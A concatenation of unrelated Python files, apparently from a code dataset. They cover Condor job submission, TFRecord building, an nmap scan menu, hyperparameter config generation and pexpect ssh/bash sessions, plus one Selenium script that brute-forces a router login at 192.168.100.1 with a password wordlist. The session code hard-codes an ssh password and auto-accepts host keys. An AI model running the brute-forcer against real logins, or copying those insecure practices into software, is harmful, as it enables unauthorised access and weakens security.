scriptFile.write ('source setup.sh\n')
command = executable + ' --single --fed ' + str(opt.fed)
if opt.single: command += " --single"
if opt.single: command += " --write"
command += (" " + ">& " + jobsDir + "/submit_map_"+str(opt.fed)+".log\n")
scriptFile.write(command)
scriptFile.write ('touch ' + jobsDir + '/done_%d\n' %opt.fed)
scriptFile.write ('echo "All done for job %d" \n'%opt.fed)
scriptFile.close ()
os.system ('chmod u+rwx '+jobsDir+'/submit_map_'+str(opt.fed)+'.sh')
condorFile = open ('%s/condor_wrapper_%d.sub'% (jobsDir,opt.fed), 'w')
condorFile.write ('Universe = vanilla\n')
condorFile.write ('Executable = '+jobsDir + '/submit_map_' + str (opt.fed) + '.sh\n')
condorFile.write ('Log = %s/condor_job_$(ProcId).log\n'%jobsDir)
condorFile.write ('Output = %s/condor_job_$(ProcId).out\n'%jobsDir)
condorFile.write ('Error = %s/condor_job_$(ProcId).error\n'%jobsDir)
condorFile.write ('queue 1\n')
condorFile.close ()
command = 'condor_submit '+ jobsDir + '/condor_wrapper_'+str(opt.fed)+'.sub'
if opt.sleep : time.sleep (0.1)
os.system (command)
print(command)
|
984,685 | bbad9b431d23884bf7d1faea5d33ffc287834a7d | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import glob
import os
import tensorflow as tf
import io
from util import Vocab
import pickle
import random
__author__ = 'Jaycolas'
# Location of the raw e-mail documents and of the generated TFRecord files.
FILEPATH='./dataset/email'
input_fname_pattern='*.txt'
TRAIN_TFRECORD_FILE = os.path.join(FILEPATH, 'train.tfrecords')
DEV_TFRECORD_FILE = os.path.join(FILEPATH, 'dev.tfrecords')
VAL_TFRECORD_FILE = os.path.join(FILEPATH, 'val.tfrecords')
# Fractions of the corpus reserved for the dev and validation splits.
DEV_SAMPLE_PER = 0.2
VAL_SAMPLE_PER = 0.1
doc_file_list = glob.glob(os.path.join(FILEPATH, input_fname_pattern))
# Minimum frequency for Vocab.filter_dictionary (0 keeps everything).
LOWER_DIC_FILTER_THRESHOLD = 0
def save_obj(obj, name):
    """Pickle *obj* to obj/<name>.pkl with the highest protocol.

    Bug fix: the path was '/obj/' (filesystem root), so saved objects
    could never be found by load_obj, which reads from the relative
    'obj/' directory.
    """
    with open('obj/' + name + '.pkl', 'wb') as f:
        pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(name):
    """Unpickle and return the object stored at obj/<name>.pkl."""
    path = 'obj/' + name + '.pkl'
    with open(path, 'rb') as f:
        return pickle.load(f)
# Python 2 module (print statements, builtin reduce).
def buildVocabforInput(file_list):
    # Build the input-side vocabulary from every document body; the first
    # line of each file holds the labels and is skipped.
    print "Building vocabulary for input"
    input_vocab = Vocab()
    for file in file_list:
        fd = io.open(file, mode='r', encoding="ISO-8859-1")
        # When we store the data, first line is for labels
        x_lines = fd.readlines()[1:]
        x_txt = reduce(lambda x,y:x+y, x_lines).split()
        #print x_txt
        input_vocab.construct(x_txt)
    input_vocab.filter_dictionary(lower_threshold=LOWER_DIC_FILTER_THRESHOLD)
    return input_vocab
def buildVocabforLabel(file_list):
    # Build the label-side vocabulary from the first line of each document
    # (the label line written when the data set was stored).
    print "Building vocabulary for label"
    label_vocab = Vocab()
    for file in file_list:
        fd = io.open(file, mode='r', encoding="ISO-8859-1")
        #When we store the data, first line is for labels
        y_txt = fd.readlines()[0].split()
        print y_txt
        label_vocab.construct(y_txt)
    label_vocab.filter_dictionary(lower_threshold=LOWER_DIC_FILTER_THRESHOLD)
    return label_vocab
def split_train_dev_val(file_list, dev_per, val_per):
    # Randomly partition file_list into train/dev/val slices. dev_per and
    # val_per are fractions in (0, 1) with dev_per + val_per < 1; whatever
    # remains becomes the training share.
    #Firstly need to check the validity of each input percentage.
    assert dev_per>0 and dev_per<1
    assert val_per>0 and val_per<1
    assert dev_per+val_per<1
    train_per = 1-dev_per-val_per
    #Randomly shuffled the total file list
    shuffled_list = random.sample(file_list, len(file_list))
    print shuffled_list
    total_cnt = len(shuffled_list)
    print "total cnt = %d"%(total_cnt)
    train_len = int(total_cnt * train_per)
    print "training samples' number is %d"%(train_len)
    dev_len = int(total_cnt * dev_per)
    print "dev samples' number is %d" % (dev_len)
    # val gets the remainder so the three slices always cover everything.
    val_len = total_cnt - train_len - dev_len
    print "val samples' number is %d" % (val_len)
    train_file_list = shuffled_list[0:train_len]
    dev_file_list = shuffled_list[train_len:train_len+dev_len]
    val_file_list = shuffled_list[train_len+dev_len: total_cnt]
    return train_file_list, dev_file_list, val_file_list
def writeTfRecordData(file_list, input_vocab, label_vocab, tf_record_file):
    # Encode each document (labels on line 1, body afterwards) through the
    # two vocabularies and serialise it as one tf.train.Example with int64
    # features 'y' (labels) and 'x' (body tokens).
    writer = tf.python_io.TFRecordWriter(tf_record_file)
    for file in file_list:
        fd = io.open(file, mode='r', encoding="ISO-8859-1")
        # When we store the data, first line is for labels
        lines = fd.readlines()
        y_txt = lines[0]
        x_lines = lines[1:]
        #print x_lines
        if y_txt and x_lines:
            x_txt = reduce(lambda x,y:x+y, x_lines)
            y = label_vocab.encode_word_list(y_txt.split())
            x = input_vocab.encode_word_list(x_txt.split())
        else:
            # Skip files missing either the label line or the body.
            print "Either y_txt or x_lines is NULL"
            continue
        example = tf.train.Example(features=tf.train.Features(feature=
                                  {'y':tf.train.Feature(int64_list=tf.train.Int64List(value=y)),
                                   'x':tf.train.Feature(int64_list=tf.train.Int64List(value=x))}))
        writer.write(example.SerializeToString())
    writer.close()
def tfrecord_main():
    # Full pipeline: build + persist both vocabularies, split the corpus,
    # then write one TFRecord file per split.
    input_vocab = buildVocabforInput(doc_file_list)
    save_obj(input_vocab,'input_vocab')
    label_vocab = buildVocabforLabel(doc_file_list)
    save_obj(label_vocab, 'label_vocab')
    train_list, dev_list, val_list = split_train_dev_val(doc_file_list,DEV_SAMPLE_PER,VAL_SAMPLE_PER)
    writeTfRecordData(train_list,input_vocab,label_vocab,TRAIN_TFRECORD_FILE)
    writeTfRecordData(dev_list,input_vocab,label_vocab,DEV_TFRECORD_FILE)
    writeTfRecordData(val_list,input_vocab,label_vocab,VAL_TFRECORD_FILE)
# Script entry point: run the whole TFRecord build.
if __name__ == '__main__':
    tfrecord_main()
|
984,686 | 63ae889f460df3048fb8d2b5b6121c4cea959a3c | import main_class_based_backup as main
import os
import ConfigParser
import time
# ANSI colour escape codes used for console output.
r = '\033[31m' #red
b = '\033[34m' #blue
g = '\033[32m' #green
y = '\033[33m' #yellow
m = '\033[34m' # NOTE(review): labelled magenta but '\033[34m' is blue ('\033[35m' would be magenta)
c = '\033[36m' #cyan (original comment incorrectly said magenta)
e = '\033[0m' #end (reset attributes)
#obj=main()
class Driver_main():
    """Interactive console driver (Python 2): prompts for scan parameters
    and hands them to main.NmapScan().driver_main()."""
    def __init__(self):
        self.NmapScanObj=main.NmapScan()
    def prompt_ScanType(self):
        # Loop until the user picks "1" (new scan) or "2" (resume paused).
        # NOTE(review): the bare except returning "1" can only fire if
        # something inside the try raises -- confirm it is intentional.
        while 1:
            scanType=raw_input(b+"Enter Your choice: \n"+y +"\n(1) For Launching New Scan \n(2) For Launching Paused Scans\n "+e)
            try:
                if(((scanType)=="1")or((scanType) =="2")):
                    break
                else :
                    print "Invalid Choice"
                #return scanType;
            except :
                return "1";
        return scanType;
    def seperator(self):
        # Print a coloured horizontal rule (name misspelling kept: callers
        # elsewhere use self.seperator()).
        print r+ "----------------------------------------------" +e
    def create_schema(self):
        # NOTE(review): schema_file and conn are not defined anywhere in
        # this module -- calling this raises NameError; confirm where these
        # globals were meant to come from.
        with open(schema_file, 'rt') as f:
            schema = f.read()
        conn.executescript(schema)
    def prompt_project(self):
        projectname=raw_input(b+"What is your Project name(no white spaces)? \n>"+y)
        return projectname
    def prompt_ips(self):
        ips=raw_input(b+"Type the IP range: \n>"+y)
        IP=ips
        return ips
    def prompt_ports(self):
        # Empty input means "no port restriction", '*' expands to the full
        # TCP range; the result is also cached on self.PORT.
        ports=raw_input(b+"Enter the Port number or Ports range: \n>"+y)
        #global PORT
        if ports == "":
            self.PORT=None
        elif(ports=="*"):
            self.PORT="1-65535"
        else:
            self.PORT=ports
        return self.PORT
    def scanbanner(self):
        # Show the scan-type menu and load the matching nmap switch string
        # from the [Scantype] section of nmap.cfg into self.SWITCH.
        cp=ConfigParser.RawConfigParser() #parses config files
        cppath="nmap.cfg" #This is the config file to be read.The config file would have various sections.Each section would be in [sq] beakets.each section would be having key/val pairs as conf setting options
        cp.read(cppath) #Read the current file nmap.cfg.The file has got only 1 section given as :[Scantype]
        #global self.SWITCH
        #global self.takescan
        print b+"SELECT THE TYPE OF SCAN: "
        self.seperator()
        print y+"1). Intense Scan"
        print "2). Intense + UDP Scan"
        print "3). Intense + TCP full Scan"
        print "4). Intense + No Ping Scan"
        print "5). TCP Ping Scan"
        print "6). PCI Ping Sweep"
        print "7). PCI full ports TCP"
        print "8). PCI Top 200 UDP"
        print "9). PCI Top 100 UDP"
        print "10). PCI Top 1000 TCP"
        self.takescan=raw_input(b+"Select the type of Scan:\n>"+y)
        if self.takescan=="1":
            self.SWITCH=cp.get('Scantype','Intense')
        elif self.takescan == "2":
            self.SWITCH=cp.get('Scantype','Intense_UDP') #-sU -T4 -A -n
        elif self.takescan == "3":
            self.SWITCH=cp.get('Scantype','Intense_TCPall') #-sS -T4 -A -n--max-rtt-timeout 500ms
        elif self.takescan == "4":
            self.SWITCH=cp.get('Scantype','Intense_NoPing') #T4 -A -v -Pn -n
        elif self.takescan == "5":
            self.SWITCH=cp.get('Scantype','Ping') #-PS
        elif self.takescan == "6":
            self.SWITCH=cp.get('Scantype','PCI_Ping_Sweep') #-PE -n -oA
        elif self.takescan == "7":
            self.SWITCH=cp.get('Scantype','PCI_Full_ports_TCP') #-Pn -sS -sV -n --max-retries 3 --max-rtt-timeout 1000ms --top-ports 1000
        elif self.takescan == "8":
            self.SWITCH=cp.get('Scantype','PCI_Top_200_UDP') #-Pn -sU -sV -n --max-retries 3 --max-rtt-timeout 100ms --top-ports 200
        elif self.takescan == "9":
            self.SWITCH=cp.get('Scantype','PCI_Top_100_UDP') #-Pn -sU -sV -n --max-retries 3 --max-rtt-timeout 100ms --top-ports 100
        elif self.takescan == "10":
            self.SWITCH=cp.get('Scantype','PCI_Top_1000_TCP') #-Pn -sS -sV -n --max-retries 3 --max-rtt-timeout 500ms
        else:
            print "Invalid value supplied"
            print "Using Default(1)"
            self.SWITCH=cp.get('Scantype','Intense')
    def banner(self,):
        # Print the ASCII-art splash banner.
        print g+" ################################################################# "+e
        print g+" ###"+r+" __ "+g+"### "+e
        print g+" ###"+r+" /\ \ \_ __ ___ __ _ _ __ "+g+"### "+e
        print g+" ###"+r+" / \/ / '_ ` _ \ / _` | '_ \ "+g+"### "+e
        print g+" ###"+r+"/ /\ /| | | | | | (_| | |_) | "+g+"### "+e
        print g+" ###"+r+"\_\ \/ |_| |_| |_|\__,_| .__/ "+g+"### "+e
        print g+" ###"+r+" |_| "+g+"### "+e
        print g+" ###"+r+" _ _ "+g+"### "+e
        print g+" ###"+r+" /_\ _ _| |_ ___ _ __ ___ __ _| |_(_) ___ _ __ "+g+"### "+e
        print g+" ###"+r+" //_\\| | | | __/ _ \| '_ ` _ \ / _` | __| |/ _ \| '_ \ "+g+"### "+e
        print g+" ###"+r+"/ _ \ |_| | || (_) | | | | | | (_| | |_| | (_) | | | | "+g+"### "+e
        print g+" ###"+r+"\_/ \_/\__,_|\__\___/|_| |_| |_|\__,_|\__|_|\___/|_| |_| "+g+"### "+e
        print g+" ###"+r+" "+g+"### "+e
        print g+" ###"+r+" __ _ _ "+g+"### "+e
        print g+" ###"+r+"/ _\ ___ _ __(_)_ __ | |_ "+g+"### "+e
        print g+" ###"+r+"\ \ / __| '__| | '_ \| __| "+g+"### "+e
        print g+" ###"+r+"_\ \ (__| | | | |_) | |_ "+g+"### "+e
        print g+" ###"+r+"\__/\___|_| |_| .__/ \__| "+g+"### "+e
        print g+" ###"+r+" |_| "+g+"### "+e
        print g+" ###"+b+" Written by: M$P@T3L "+g+"### "+e
        print g+" ################################################################# "+e
    def start(self):
        # Top-level flow: banner, root check, prompt for everything, then
        # delegate to NmapScan.driver_main().
        self.method_id="Main"
        self.banner()
        if os.geteuid() != 0:
            exit( r+ "\n You need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting."+e)
        #clearLogs()
        scan_type=self.prompt_ScanType();
        print "Scan type chosen is :"+str(scan_type)
        self.seperator()
        if (scan_type=="1"):
            targethosts=self.prompt_ips()
            self.seperator()
            self.scanbanner()
            print "self.SWITCH: " + g+ self.SWITCH +e
            self.seperator()
            # Scan types above 7 carry their own fixed port selections.
            if int(self.takescan)>7:
                targetports=None
            else:
                targetports=self.prompt_ports()
                print self.PORT
            self.seperator()
            path=self.prompt_project()
            path=''.join(path.split()).lower()
            self.NmapScanObj.driver_main(targethosts,path,targetports,scan_type,self.SWITCH,'',mode="c")
        elif(scan_type=="2"):
            self.NmapScanObj.driver_main('','','',scan_type,'','',mode="c")
# Instantiate the driver and start the interactive workflow at import time
# (this module is meant to be executed as a script).
obj=Driver_main()
obj.start()
|
984,687 | 6fd1078d7863b3f2a5e7eee6ec4ced674cca3bd4 | import logging
import traceback
class base_config_generator(object):
    """
    The config generator determines how new configurations are sampled. This can take very different levels of
    complexity, from random sampling to the construction of complex empirical prediction models for promising
    configurations.
    """
    def __init__(self, logger=None):
        """
        Parameters
        ----------
        logger: logging.Logger
            logger for debug output; defaults to the shared 'hpbandster'
            logger when None (the original docstring documented
            nonexistent 'directory'/'overwrite' parameters)
        """
        if logger is None:
            self.logger = logging.getLogger('hpbandster')
        else:
            self.logger = logger

    def get_config(self, budget):
        """
        function to sample a new configuration

        This function is called inside Hyperband to query a new configuration

        Parameters
        ----------
        budget: float
            the budget for which this configuration is scheduled

        returns: (config, info_dict)
            must return a valid configuration and a (possibly empty) info dict
        """
        raise NotImplementedError('This function needs to be overwritten in %s.' % (self.__class__.__name__))

    def new_result(self, job, update_model=True):
        """
        registers finished runs

        Every time a run has finished, this function should be called
        to register it with the result logger. If overwritten, make
        sure to call this method from the base class to ensure proper
        logging.

        Parameters
        ----------
        job: instance of hpbandster.distributed.dispatcher.Job
            contains all necessary information about the job
        update_model: boolean
            determines whether a model inside the config_generator should be updated
        """
        # Idiom fix: 'if not job.exception is None' -> 'is not None'.
        if job.exception is not None:
            self.logger.warning("job {} failed with exception\n{}".format(job.id, job.exception))
|
984,688 | 00cc7d5e725f019d5d4d919cdc286b707f93186c | #!/usr/bin/env python2
import os
import time
import ConfigParser
import selenium.webdriver as webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import ElementNotInteractableException
from selenium.webdriver.support import expected_conditions as EC
from termcolor import colored
# Read form element ids and the word-list name from ./config.cfg.
current_path = os.getcwd()
config = ConfigParser.ConfigParser()
config.read(current_path + '/config.cfg')
username_form_id = config.get('form_id', 'username')
password_form_id = config.get('form_id', 'password')
submit_form_id = config.get('form_id', 'submit')
word_list = config.get('word_list', 'file')
password_list = []
# path = ("/home/hassan/Dropbox/development/projects/resources/wordlists/rockyou.txt")
# NOTE(review): the configured word_list value is ignored; the hard-coded
# common.txt in the working directory is used instead -- confirm intent.
path = current_path + "/" + "common.txt"
def send_data(word_password):
    """Fill the login form with user 'admin' and *word_password*, submit it,
    and print a [Failed] line for this attempt.

    Bug fix: the failure line used to print the module-level loop variable
    ``each_password`` instead of the password actually submitted, so the
    function lied about what it tried when called with any other value.
    """
    # Wait until the password field exists before touching the form.
    WebDriverWait(driver, 10).until(
        EC.presence_of_element_located((By.ID, password_form_id)))
    username = driver.find_element_by_id(username_form_id)
    password = driver.find_element_by_id(password_form_id)
    login_button = driver.find_element_by_id(submit_form_id)
    username.send_keys("admin")
    password.send_keys(word_password)
    login_button.click()
    # If the pass is wrong
    # element = WebDriverWait(driver, 5).until(EC.alert_is_present())
    # alert = driver.switch_to_alert()
    # alert.accept()
    print(colored('[Failed]\t', 'red') + word_password)
the_file = open(path, "r")
for n in the_file:
password_list.append(n.rstrip())
the_file.close()
driver = webdriver.Firefox()
driver.get("http://192.168.100.1")
for i, each_password in enumerate(password_list):
try:
send_data(each_password)
except ElementNotInteractableException:
print "next is " + each_password
time.sleep(61)
send_data(each_password)
except TimeoutException:
print(colored('[Success]\t', 'green') + each_password)
driver.quit()
break
|
984,689 | 439298e56eb116dcd735809496ab6d2103d79a37 | """
File Name : sessionManager.py
File Owner : Nabanita Dutta
Description : This files defines the classes and methods for creating,
maintaining and tearing session for remote amd local shell.
History :
Modified By Version Date Description
------------------ ---------- ----- ------------------
"""
"""
Import :
"""
import os
import pexpect
import re
import signal
import string
import types
import sys
#import tempfile
#import threading
import time
import globalVar
"""
CONSTANTS :
"""
# Base expect() pattern list shared by every session: EOF and TIMEOUT are
# always candidate patterns. NOTE(review): methods append their per-call
# expected pattern to this module-level list, so it is shared mutable state.
expList = [pexpect.EOF, pexpect.TIMEOUT]
# ASCII ETX -- the byte a terminal sends for Ctrl-C.
CTRL_C = '\x03'
"""
Classes :
"""
class SessionManagerException(Exception):
    """Generic exception for all sessions; wraps a message string."""

    def __init__(self, value):
        # Keep the message on .value so callers can inspect it directly.
        self.value = value

    def __str__(self):
        return self.value
class SessionManagerCommandError(Exception):
    """Error sending or executing a command."""

    def __repr__(self):
        return "The session prompt was not seen in the output."
class SessionManager(object):
"""Abstract base class for session operations. Although the public
methods are implemented, the session specific private methods must
be defined by descendents of SessionManager.
"""
    def __init__(self, command, args, prompt, parent=None, timeout=30,context=None ):
        """
        Construct a new session by 'connecting' to a command via
        pexpect and then doing whatever negotiations are necessary to
        establish positive contact.

        Arguments:
        command -- command or path to command that the session will run
        args    -- command line options and arguments
        prompt  -- the prompt that precedes each user input
        parent  -- the session object that contains the spawned
                   expect process that this new session will attach to
        timeout -- default timeout for expect() calls [30 seconds];
                   0 means "use globalVar.sshTimeout"
        context -- opaque object stored on the session for later use
        """
        # Child sessions reuse the parent's already-spawned process.
        if parent:
            self.spawnProc = parent.spawnProc
            self.isChild = True
        else:
            self.isChild = False
        self.context = context
        self.command = command
        self.args = args
        self.prompt = prompt
        self.sshTimeout = int ( globalVar.sshTimeout)
        if (timeout != 0) :
            self.sshTimeout = timeout
        try:
            self._connect()
            # sleeping 2 second to give control to other processes
            # This is done to resolve EOF problem
            time.sleep(2)
            # Checking if the spawned process lives. It is observed that the
            # spawned process for gen dies because of TIME_WAIT problem
            # If the process had died, sleep for 60 secs so that the socket
            # is closed or binding is released (BSD implementation)
            # Try spawning the process again, this time it should get thru.
            if not self.spawnProc.isalive():
                time.sleep(60)
                self._connect()
        except pexpect.EOF:
            # EOF with a live process means the command never came up;
            # EOF from a finished process is the normal post-connect path.
            if self.spawnProc.isalive():
                raise SessionManagerException("error starting %s" % command)
            else:
                self._postConnect()
        except Exception, e:
            msg = "session error: %s" % e
            self.disconnect()
            raise e
def issueCommand(self,command, timeout=3, message=None):
"""
Send a command to the process spawned by pexpect and and do
not wait for anything.
This command should not be used unless really necessary
"""
p = self.spawnProc
p.sendline(command)
#self._checkCommandStatus()
# Renamed assertCommand from Command
def assertCommand(self,command, expected=None, timeout=30, message=None):
assertTimeout = int (globalVar.assertTimeout)
if (timeout != 0) :
assertTimeout = timeout
ssh = self.spawnProc
eatPrompt = True
if not expected:
eatPrompt = False
expected = self.prompt
if not message:
message = 'command "%s" timed out waiting for %s' % \
(command, expected)
expList.append(expected)
ssh.sendline(command)
res = ssh.expect(expList, assertTimeout)
if eatPrompt:
ssh.expect(self.prompt, assertTimeout)
if (res != expList.index(expected)):
self._postCheck(res, message)
#try :
# if eatPrompt:
# ssh.expect(self.prompt, timeout)
#except pexpect.TIMEOUT:
# raise SessionManagerException(message)
return ssh.before
def assertOutput(self, expected=None, timeout=5, message=None):
"""
This functionsWait for the expected output from the spawned pexpect process.
This method sends nothing to the process but expects output;
useful in cases where some event other than direct command input
is causing the process to react.
If expect times out or end of file is received an AssertionError will be raised
"""
assertTimeout = int (globalVar.assertTimeout)
if (timeout != 0) :
assertTimeout = timeout
p = self.spawnProc
#If any expected output is specified, append it to the List
if not expected:
expected = self.prompt
expList.append(expected)
if not message :
message = "Expected output %s not received" %expected
# Wait for the output
result = p.expect(expList, assertTimeout)
# If expected is true and the output is not expected, Call the _postCheck function
if (result != expList.index(expected)):
self._postCheck(result, message)
expList.remove(expected)
def filter(self, subcommand, pattern=None, delim=None):
"""
Send a command and return filtered output.
"""
#print "filter command:%s" %subcommand
# Clear the buffer so that the output of the previous command(s) is
# eaten up
clear = False
count = 0
# Changed the code to support delimeter other than '#'
if (not delim):
prompt = self.prompt
else:
prompt = delim
while(clear == False):
res = self.spawnProc.expect([prompt,pexpect.TIMEOUT],.5)
if (res == 1):
clear = True
output = self._sendAndTrim(subcommand,delim)
#self._checkCommandStatus()
return output
def disconnect(self):
"""
Disconnect from the session. If we are a subsession, close
the spawned pexpect process. This method assumes the
subsession has sent whatever commands necessary to end itself,
so we expect an EOF here before the close.
Expect the process to be closing or already closed, which
generates an EOF. Look # for a 2-second timeout also.
If no spawnProc is defined, return quietly so that callers don't
have problems when calling disconnect() more than once.
"""
if not self.spawnProc:
return
ssh = self.spawnProc
try:
ssh.expect([pexpect.EOF], self.sshTimeout)
except OSError,e:
ssh.kill(signal.SIGKILL)
self.cleanUp()
except pexpect.TIMEOUT:
ssh.kill(signal.SIGKILL)
self.cleanUp()
except Exception, exc:
ssh.kill(signal.SIGKILL)
self.cleanUp()
self.cleanUp()
def cleanUp(self):
"""Clean up all the resource created during the session creation"""
self.isConnected=False
self.spawnProc=None
############################################################
# Internal methods below - may be overridden by descendents
############################################################
def _postCheck (self, result, message=None, promptCheck=False):
"""
This function does the error handling for the functions:
assertOutput, assertCommand, filter.
If error is end of file or timeout then AssertionError is raised
with the message.
Arguments:
result : The result of the p.expect command
message : Message to be printed if the command failed
"""
if not message:
message = "Execution of command failed"
if promptCheck :
if (result == expList.index(self.prompt)):
# got a prompt, want to save the prompt chunk so we can use
# it later to trim command output. do this by sending a
# \r and cultivating the bare prompt.
self.spawnProc.sendline("")
self.spawnProc.expect(self.prompt)
self._extractPChunk(self.spawnProc.before)
expList.remove(self.prompt)
# If timeout occured, raise Assertion error
if (result == expList.index(pexpect.TIMEOUT)):
raise AssertionError('TIME OUT : %s '%message)
# If End of file received, raise Assertion error
elif (result == expList.index(pexpect.EOF)):
raise AssertionError('End Of file received: %s '%message)
def _checkCommandStatus(self, lastCommand=False):
"""Get the status of the last command.
"""
p = self.spawnProc
p.sendline('echo $?')
regex = re.compile('^[0-9]+',re.M)
p.expect(regex, 2)
msg = '_checkCommandStatus : Execution of command FAILED'
if lastCommand:
msg = '_checkCommandStatus :Execution of command : "%s" FAILED' %lastCommand
if p.after != '0' and p.after != '99':
raise AssertionError(msg)
def _connect(self):
"""
Run the command or spawn the process that is the basis for the
session. If we are a parent session, then create the new
spawned process. If we are a child, send the command to the
existing subprocess.
"""
if not self.isChild:
msg = "SessionManager._connect: failed to spawn %s, timeout is : %s" % (self.command, self.sshTimeout)
try:
self.spawnProc = pexpect.spawn(self.command,
self.args, self.sshTimeout)
if not self.spawnProc:
raise SessionManagerException(msg)
self._postConnect()
self.isConnected = True
except pexpect.TIMEOUT:
raise SessionManagerException("Timeout while " + msg)
except pexpect.EOF:
raise SessionManagerException("SessionManager._connect :End of File condition while " + msg)
except Exception, exc:
raise SessionManagerException('SessionManager._connect: caught %s' % exc)
else:
cmdline = self.command + ' ' + string.join(self.args,' ')
self.spawnProc.sendline(cmdline)
self.isConnected = True
def _extractPChunk(self, line):
""" Extract the prompt from the program output. This is for
use with (expect) functions that determine end-of-output by
waiting for the command prompt. The problem is that the
prompt (or a piece of it) is left in the output. The
extracted prompt chunk is used later in the trim functions.
"""
chunk = string.split(line,'\n')[1]
self.promptChunk = chunk
def _postConnect(self):
""" Do whatever expect operations necessary to establish
positive contact with the command after connecting. If
overriding in a descendent, this method must set the
promptChunk variable if using the default _sendAndTrim().
"""
p = self.spawnProc
msg = "SessionManager._postConnect: failed to get prompt"
expList.append(self.prompt)
match = p.expect(expList, self.sshTimeout)
self._postCheck(match,msg,True)
def _sendAndTrim(self, command, delim=None):
"""
General-purpose method that will send the command and trim
the prompt from the output.
"""
assertTimeout = int (globalVar.assertTimeout)
p = self.spawnProc
p.sendline(command)
a=p.readline()
#print a
if (not delim):
prompt = self.prompt
else:
prompt = delim
expList.append(prompt)
result = p.expect(expList,assertTimeout)
if (result != 2) :
self._postCheck(result)
# at this point, we have the output but also the command and
# part of the prompt. get rid of the prompt chunk.
if (not delim):
promptChunk = self.promptChunk
else:
promptChunk = delim
output = re.sub(promptChunk, '', p.before)
output = re.sub(command+'\r\n', '', output)
return output
class SSH(SessionManager):
"""Set up an SSH session.
Note that brackets ("[", "]") are NOT ALLOWED in the prompt string
on the target host. Brackets will screw up the trim functions
because they are list operators in Python. Beware of any other
characters in the prompt that might confuse this class.
The first argument should be in the format login@ip.
The prompt MUST end with '$' or '#', followed by a space. This is a
typical default for most shells, except maybe the C-shell varieties,
which are not endorsed by The Creator."""
def __init__(self, args, parent=None,ctxt=None):
if not args: args = []
if type(args) is types.StringType:
# Code added for checking if the login
# arguments are of the type "user@<remoteip>"
# if not then by default the user is taken as "root"
# and the login arguments become "root@<ip>
#Added by ND
# Commented by Akanksha
# While loggin in to the local shell this isnt provided
# Remove this or add better handling
#logindetails = args.split("@")
#self.ipaddr = logindetails[1]
args = [args]
if (args[0].find('@') == -1):
user = "root"
login = user + '@' + args[0]
args[0] = login
self.longComand = None
super(SSH, self).__init__("ssh", args, "[#$] ", parent,context=ctxt)
def disconnect(self):
"""Send an exit to the remote shell and give it a chance to
finish up before calling the parent disconnect, which closes
the pexpect subprocess."""
p = self.spawnProc
p.sendline("exit")
super(SSH, self).disconnect()
def runLong(self, command):
"""Run a command that is expected to run for a long time,
like 'tail -f'."""
self.longCommand = command
self.spawnProc.sendline(command)
def stopLong(self, reject=False):
"""Stop a command started by runLongCmd.
Returns any output generated by the command or a timeout
string. If reject is true, bail out after the command is
stopped.
TODO The '^C' string does not occur in terminal output on
TODO Linux, therefore the regex substitution will fail to find
TODO a match and you'll get the prompt in the output. This can
TODO be fixed for Linux by doing a uname check and modifying
TODO the trailingJunk string accordingly.
TODO The output is not completely clean. Tests have shown a
TODO leading space and a trailing newline. Callers can
TODO strip() the output, so not a high priority. Caveat
TODO emptor!
"""
if self.longCommand:
p = self.spawnProc
#print 'stopLong: sending ctrl-c'
p.send(CTRL_C)
match = p.expect([self.prompt,
pexpect.TIMEOUT], 2)
if match == 0:
if reject: return
trailingJunk = '\^C' + '\r\n' + self.promptChunk
output = re.sub(self.longCommand+'\r\n', '', p.before)
output = re.sub(trailingJunk, '', output)
return output
else:
return "timed out"
def _postConnect(self):
"""
This function performs the error checking for the ssh specific
connections.
The matching of the prompt received when ssh command is executed is done against
different pexpect error conditions.
Exceptions are raised based on the error condition of SSH connection scenarios.
"""
#timeout = 5
p = self.spawnProc
list = [self.prompt,"ssh:", "[Pp]assword: ", "\? ",
"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@",
pexpect.EOF,pexpect.TIMEOUT]
match = p.expect(list,self.sshTimeout )
#prompt
if (match == list.index(self.prompt)) :
# got a prompt, want to save the prompt chunk so we can use
# it later to trim command output. do this by sending a
# \r and cultivating the bare prompt.
p.sendline("")
p.expect(self.prompt)
self._extractPChunk(p.before)
# ssh error message
elif (match == list.index("ssh:")):
# TODO: send the ssh error text in the exception
msg = "Error occured while executing ssh command "
raise SessionManagerException,msg
# passwd prompt
elif match == 2:
msg = "ssh command got 'Password:' prompt,"
p.sendline("shipped!!")
try:
p.expect(self.prompt,self.sshTimeout)
self._extractPChunk(p.before)
except pexpect.TIMEOUT:
print msg
raise SessionManagerException,msg
# connect confirmation prompt
elif match == 3:
p.sendline("yes")
p.expect(list[2])
p.sendline("shipped!!")
try:
p.expect(self.prompt,self.sshTimeout)
self._extractPChunk(p.before)
except pexpect.TIMEOUT:
msg = "ssh login confirmation problem"
msg = msg + " Key exchange not successful "
print msg
raise SessionManagerException,msg
self._extractPChunk(p.before)
# Remote host identification change
elif match == 4:
msg = "Remote host identification change: check ~/.ssh/known_hosts file"
raise SessionManagerException, msg
# Unexpected Prompt while trying to connect
elif match == 5:
msg = "ssh got unexpected prompt, did not establish connection"
raise SessionManagerException, msg
# Timeout Error
elif (match == list.index(pexpect.TIMEOUT)):
msg = 'ssh to %s timed out' % self.args
raise SessionManagerException, msg
class LocalShell(SessionManager):
    """Session wrapper around a local bash shell.

    The prompt MUST end with '$' or '#', followed by a space -- the
    typical default for most Bourne-style shells (C-shell varieties
    are not supported).
    """
    def __init__(self):
        super(LocalShell, self).__init__('bash', [], '[#$] ', None, context=None)
    def disconnect(self):
        """Ask the shell to exit, then let the parent class reap the
        pexpect subprocess."""
        shell = self.spawnProc
        shell.sendline("exit")
        super(LocalShell, self).disconnect()
    def waitForLongMessage(self, message):
        """Wait up to 65s for *message* while a long-running command is
        active; return the matched index (0=message, 1=timeout, 2=EOF)."""
        matched = self.spawnProc.expect([message, pexpect.TIMEOUT, pexpect.EOF], 65)
        return matched
import unittest
class TestSSH(unittest.TestCase):
    """Manual smoke tests for the session classes.

    NOTE(review): most test bodies begin with a bare ``return``, i.e. they
    are intentionally disabled (they need live hosts / interactive ssh);
    the code after each ``return`` is unreachable and kept for reference.
    """
    def testSSHRemote(self):
        # Disabled: requires a reachable host at the hard-coded address.
        return
        self.ip = 'root@172.16.45.25'
        s = SSH(self.ip)
